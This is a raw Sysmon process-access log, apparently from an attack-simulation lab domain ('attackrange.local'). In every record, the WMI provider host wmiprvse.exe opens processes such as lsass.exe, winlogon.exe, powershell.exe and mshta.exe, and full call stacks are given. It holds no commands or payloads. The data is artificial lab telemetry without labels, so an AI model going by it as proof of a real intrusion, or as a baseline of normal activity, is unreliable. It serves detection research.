15:59:27.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024874Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024873Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024872Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024871Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024870Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024869Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024868Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024867Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024866Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535E-6008-5206-00000000A301}6932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024865Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535E-6008-5106-00000000A301}6508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024864Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535E-6008-5006-00000000A301}1804C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024863Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024862Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024861Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024860Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024859Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024858Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024857Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024856Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024855Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 